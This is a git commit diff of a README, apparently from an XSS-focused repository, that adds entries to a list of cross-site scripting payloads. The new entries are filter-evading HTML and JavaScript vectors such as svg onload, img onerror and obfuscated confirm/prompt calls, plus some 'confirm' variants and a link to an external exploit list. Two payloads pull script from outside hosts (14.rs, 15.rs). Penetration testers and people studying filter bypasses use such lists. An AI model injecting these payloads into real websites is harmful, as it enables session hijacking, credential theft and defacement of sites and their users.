Added more payloads and stuff
This commit is contained in:
parent
f2875878b4
commit
e222e9bdd5
1 changed files with 18 additions and 2 deletions
20
README.md
20
README.md
|
@ -54,22 +54,38 @@ Put this repo on watch. I will be updating it regularly.
|
||||||
|
|
||||||
### Awesome Payloads
|
### Awesome Payloads
|
||||||
```
|
```
|
||||||
|
<--`<img/src=` onerror=alert(1)> --!>
|
||||||
<svg%0Aonload=%09((pro\u006dpt))()//
|
<svg%0Aonload=%09((pro\u006dpt))()//
|
||||||
<sCript x>(((confirm)))``</scRipt x>
|
<sCript x>(((confirm)))``</scRipt x>
|
||||||
<svg/x=">"/onload=confirm()//
|
<svg/x=">"/onload=confirm()//
|
||||||
|
<svg </onload ="1> (_=prompt,_(1)) "">
|
||||||
<embed src=//14.rs>
|
<embed src=//14.rs>
|
||||||
|
<script x=">" src=//15.rs></script>
|
||||||
|
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
|
||||||
|
<iframe/src \/\/onload = prompt(1)
|
||||||
<x oncut=alert()>x
|
<x oncut=alert()>x
|
||||||
<details ontoggle=confirm()>
|
<details ontoggle=confirm()>
|
||||||
|
<svg onload=write()>
|
||||||
|
<script y="><">/*<script* */prompt()</script
|
||||||
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
|
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Awesome Confirm Variants
|
||||||
|
Yep, confirm because alert is too mainstream.
|
||||||
|
```
|
||||||
|
confirm()
|
||||||
|
confirm``
|
||||||
|
(((confirm)))``
|
||||||
|
new class extends confirm``{}
|
||||||
|
```
|
||||||
|
|
||||||
### Awesome Exploits
|
### Awesome Exploits
|
||||||
Come back later
|
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
|
||||||
|
|
||||||
### Awesome Tags & Event Handlers
|
### Awesome Tags & Event Handlers
|
||||||
- [List of all Event Handlers](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
|
- [List of all Event Handlers](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
|
||||||
|
|
||||||
#### HTML Tags that you will be using
|
Most used HTML Tags that you will be using
|
||||||
```
|
```
|
||||||
img
|
img
|
||||||
svg
|
svg
|
||||||
|
|
Loading…
Reference in a new issue